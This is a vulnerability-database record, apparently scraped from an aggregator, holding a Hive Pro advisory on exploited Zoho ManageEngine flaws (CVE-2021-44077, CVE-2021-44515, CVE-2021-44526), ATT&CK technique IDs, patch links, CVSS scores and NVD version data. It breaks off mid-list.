ID HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280Type hiveproReporter Hive ProModified 2021-12-05T12:31:49
Description
THREAT LEVEL: Red.
For a detailed advisory, download the pdf file here.
Multiple vulnerabilities have been discovered in Zoho ManageEngine products. The affected products include Zoho ManageEngine ServiceDesk Plus, Zoho ManageEngine SupportCenter Plus, Zoho ManageEngine Desktop Central, Zoho ManageEngine AssetExplorer.
Vulnerability Details
Indicators of Compromise(IoCs) *
Patch Link
<https://www.manageengine.com/desktop-management-msp/cve-2021-44515-security-advisory.html>
<https://www.manageengine.com/products/service-desk/security-response-plan.html>
<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44526-and-cve-2021-44515-authentication-bypass-vulnerabilities-in-servicedesk-plus-and-desktop-central>
<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44526-and-cve-2021-44515-authentication-bypass-vulnerabilities-in-assetexplorer-and-desktop-central>
References
<https://us-cert.cisa.gov/ncas/alerts/aa21-336a>
<https://www.bleepingcomputer.com/news/security/zoho-patch-new-manageengine-bug-exploited-in-attacks-asap/>
<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>
Indicates parameters that apply to CVE-2021-44077
{"id": "HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280", "vendorId": null, "type": "hivepro", "bulletinFamily": "info", "title": "Several Zoho ManageEngine products have been exploited", "description": "#### THREAT LEVEL: Red.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/11/Several-Zoho-ManageEngine-products-have-been-exploited_TA202154.pdf>)[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F11%2FSeveral-Zoho-ManageEngine-products-have-been-exploited_TA202154.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" ) \n\n\nMultiple vulnerabilities have been discovered in Zoho ManageEngine products. The affected products include Zoho ManageEngine ServiceDesk Plus, Zoho ManageEngine SupportCenter Plus, Zoho ManageEngine Desktop Central, Zoho ManageEngine AssetExplorer. \nCVE 2021 44077 is a vulnerability that could allow an attacker to run arbitrary code. It was discovered on November 20, 2021. This vulnerability, however, may be easily fixed by updating to Zoho version 11306, which was released in September. Attackers are focusing on the healthcare, financial services, electronics, and IT consulting businesses by exploiting this vulnerability. \nCVE 2021 44515 & CVE 2021 44526 are authentication bypass vulnerabilities. CVE 2021 44515 only affects Zoho ManageEngine ServiceDesk and Zoho ManageEngine AssetExplorer who uses Desktop Central Agent for asset discovery and CVE 2021 44526 affects all vulnerable versions of Zoho ManageEngine ServiceDesk and Zoho ManageEngine AssetExplorer. \nTwo of these vulnerabilities (CVE 2021 44077 and CVE 2021 44515) have been exploited in the wild so organizations should upgrade their Zoho ManageEngine products to their latest versions to eliminate these vulnerabilities. \nThe Techniques used by an unknown actor to exploit CVE 2021 44077 includes: \nT1190 - Exploit Public Facing Application \nT1505.003 - Server Software Component: Web Shell \nT1027 - Obfuscated Files or Information \nT1140 - Deobfuscate/Decode Files or Information \nT1003 - OS Credential Dumping \nT1218 - Signed Binary Proxy Execution \nT1136 - Create Account \nT1003.003 - OS Credential Dumping: NTDS \nT1047 - Windows Management Instrumentation \nT1070.004 - Indicator Removal on Host: File Deletion \nT1087.002 - Account Discovery: Domain Account \nT1560.001 - Archive Collected Data: Archive via Utility \nT1573.001 - Encrypted Channel: Symmetric Cryptography[](<https://docs.google.com/viewer?url=https%3A%2F%2Fwww.hivepro.com%2Fwp-content%2Fuploads%2F2021%2F12%2FMicrosoft-could-not-patch-this-vulnerability-yet-again_TA202153.pdf&embedded=true&chrome=false&dov=1> \"View this pdf file\" )\n\n#### Vulnerability Details\n\n\n\n#### Indicators of Compromise(IoCs) *\n\n\n\n#### Patch Link\n\n<https://www.manageengine.com/desktop-management-msp/cve-2021-44515-security-advisory.html>\n\n<https://www.manageengine.com/products/service-desk/security-response-plan.html>\n\n<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44526-and-cve-2021-44515-authentication-bypass-vulnerabilities-in-servicedesk-plus-and-desktop-central>\n\n<https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44526-and-cve-2021-44515-authentication-bypass-vulnerabilities-in-assetexplorer-and-desktop-central>\n\n#### References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa21-336a>\n\n<https://www.bleepingcomputer.com/news/security/zoho-patch-new-manageengine-bug-exploited-in-attacks-asap/>\n\n<https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/>\n\n \n\n \n\n* Indicates parameters that apply to CVE-2021-44077", "published": "2021-12-05T12:31:49", "modified": "2021-12-05T12:31:49", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://www.hivepro.com/several-zoho-manageengine-products-have-been-exploited/", "reporter": "Hive Pro", "references": [], "cvelist": ["CVE-2021-44077", "CVE-2021-44515", "CVE-2021-44526"], "immutableFields": [], "lastseen": "2021-12-17T07:20:56", "viewCount": 58, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-44526", "CVE-2021-44077", "CVE-2021-44515"]}, {"type": "attackerkb", "idList": ["AKB:72CD807D-E26D-4F68-8717-436863B7F8B1", "AKB:691FE896-C4DF-492A-BF1B-2E720F24CB12"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/MANAGEENGINE_SERVICEDESK_PLUS_CVE_2021_44077/"]}, {"type": "nessus", "idList": ["MANAGEENGINE_DESKTOP_CENTRAL_10_1_2137_3.NASL", "MANAGEENGINE_SERVICEDESK_11_3_BUILD11306.NASL"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2021-0920"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:45C740B931E148E6075FD00036A389CB", "RAPID7BLOG:104BCB9FE21AA540C50BD81151F701D5"]}, {"type": "cisa", "idList": ["CISA:72D01121CAFBC56638BC974ABA539CF8", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:DD18BE6DC961451834F7597A6E8AAE45", "CISA:C9AC32BB051B58B7F0F6E0FD2949390C"]}, {"type": "thn", "idList": ["THN:A29E47C7A7467A109B420FF0819814EE", "THN:DB8E18C57AFB9EEEFDABD840FBF5D938", "THN:60B42277F576BB78A640A9D3B976D8D8"]}, {"type": "threatpost", "idList": ["THREATPOST:98AF08B524D08ABCEB115FECEE99B70F", "THREATPOST:927CAECDA58E6BC3266D14FE340589BB", "THREATPOST:81CC7A43B010B785FD5977FBA1043E11"]}, {"type": "zdt", "idList": ["1337DAY-ID-37167"]}, {"type": "githubexploit", "idList": ["1A95BB02-1B5A-5BC5-9B6B-61483A1C1100"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:165400"]}], "modified": "2021-12-17T07:20:56", "rev": 2}, "score": {"value": 6.6, "vector": "NONE", "modified": "2021-12-17T07:20:56", "rev": 2}, "vulnersScore": 6.6}}
{"cve": [{"id": "CVE-2021-44526", "vendorId": null, "hash": "50d93573a46bff2cf2f9f0977f8b5d5a", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44526", "description": "Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin configurations.", "published": "2021-12-23T15:15:00", "modified": "2022-01-06T18:06:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "MEDIUM", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.8}, "severity": "MEDIUM", "exploitabilityScore": 8.6, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44526", "reporter": "cve@mitre.org", "references": ["https://www.manageengine.com/products/service-desk/on-premises/readme.html#12003"], "cvelist": ["CVE-2021-44526"], "immutableFields": [], "lastseen": "2022-01-06T19:26:54", "history": [{"bulletin": {"id": "CVE-2021-44526", "vendorId": null, "hash": "81f6e6878947ee8dd226cc834ef081cd", "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2021-44526", "description": "Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin configurations.", "published": "2021-12-23T15:15:00", "modified": "2021-12-23T15:25:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-44526", "reporter": "cve@mitre.org", "references": ["https://www.manageengine.com/products/service-desk/on-premises/readme.html#12003"], "cvelist": ["CVE-2021-44526"], "immutableFields": [], "lastseen": "2021-12-23T17:26:02", "history": [], "viewCount": 8, "enchantments": {"dependencies": {"references": [{"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2021-12-23T17:26:02", "rev": 2}, "score": {"value": 4.0, "vector": "NONE", "modified": "2021-12-23T17:26:02", "rev": 2}}, "objectVersion": "1.6", "cpe": [], "cpe23": [], "cwe": [], "affectedSoftware": [], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": []}, "extraReferences": [{"url": "https://www.manageengine.com/products/service-desk/on-premises/readme.html#12003", "name": "https://www.manageengine.com/products/service-desk/on-premises/readme.html#12003", "refsource": "MISC", "tags": []}]}, "lastseen": "2021-12-23T17:26:02", "differentElements": ["affectedSoftware", "cpe", "cpe23", "cpeConfiguration", "cvss", "cvss2", "cvss3", "cwe", "extraReferences", "modified"], "edition": 1}], "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "hivepro", "idList": ["HIVEPRO:C7C4C4FD6D71992EA2AF88F0ECFBD280"]}], "modified": "2022-01-06T19:26:54", "rev": 2}, "score": {"value": 4.0, "vector": "NONE", "modified": "2022-01-06T19:26:54", "rev": 2}}, "objectVersion": "1.6", "cpe": ["cpe:/a:zohocorp:manageengine_servicedesk_plus:10.0", "cpe:/a:zohocorp:manageengine_servicedesk_plus:10.5", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.2", "cpe:/a:zohocorp:manageengine_servicedesk_plus:9.3", "cpe:/a:zohocorp:manageengine_servicedesk_plus:12.0", "cpe:/a:zohocorp:manageengine_servicedesk_plus:10.0.0", "cpe:/a:zohocorp:manageengine_servicedesk_plus:8.2", "cpe:/a:zohocorp:manageengine_servicedesk_plus:9.4", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.0", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.1", "cpe:/a:zohocorp:manageengine_servicedesk_plus:9.2", "cpe:/a:zohocorp:manageengine_servicedesk_plus:8.1", "cpe:/a:zohocorp:manageengine_servicedesk_plus:11.3", "cpe:/a:zohocorp:manageengine_servicedesk_plus:9.0", "cpe:/a:zohocorp:manageengine_servicedesk_plus:9.1"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9239:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9241:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9018:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8217:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11123:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11137:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11127:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9022:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9331:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10513:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11117:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9235:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10012:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11141:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9024:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9232:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9119:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9116:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9228:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9035:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9118:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11104:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8211:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9326:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8215:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10007:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11132:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11131:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11009:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10021:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9424:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11101:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9012:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9224:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9109:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11118:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10510:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9305:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9227:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9003:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9007:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9422:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11011:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9045:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8205:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9325:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9020:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11121:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11003:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8203:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8202:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11125:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9111:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9216:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8207:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9006:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11308:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10014:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9034:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11122:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11300:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9000:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9229:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8213:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10508:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11208:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11209:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9113:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9403:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9335:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10507:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11203:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11115:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11121:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11136:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9423:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11132:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11133:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9324:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:build11201:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10008:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9242:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9414:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11144:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8206:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10006:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9046:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11108:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11137:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11301:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11107:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11200:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9412:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11007:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11211:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10013:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9030:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10512:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9426:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9207:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11144:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:build11135:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9016:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9021:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9002:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9409:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9332:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11309:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11210:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11305:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9027:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:11001:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9314:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9327:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11110:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8212:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9014:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9037:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9306:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11114:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9033:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9333:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9233:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9115:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9010:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11120:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:11204:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9312:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11147:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11142:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9031:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9212:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.5:10514:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9334:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10015:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9416:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.0:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11116:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9112:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.2:build11203:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9328:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11130:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11133:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9025:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.0:9028:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11102:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10004:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:8.2:8210:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.1:11141:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9418:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:10.0.0:10017:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9330:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:-:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.1:9100:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:11.3:11306:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.2:9219:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.3:9319:*:*:*:*:*:*", "cpe:2.3:a:zohocorp:manageengine_servicedesk_plus:9.4:9419:*:*:*:*:*:*", 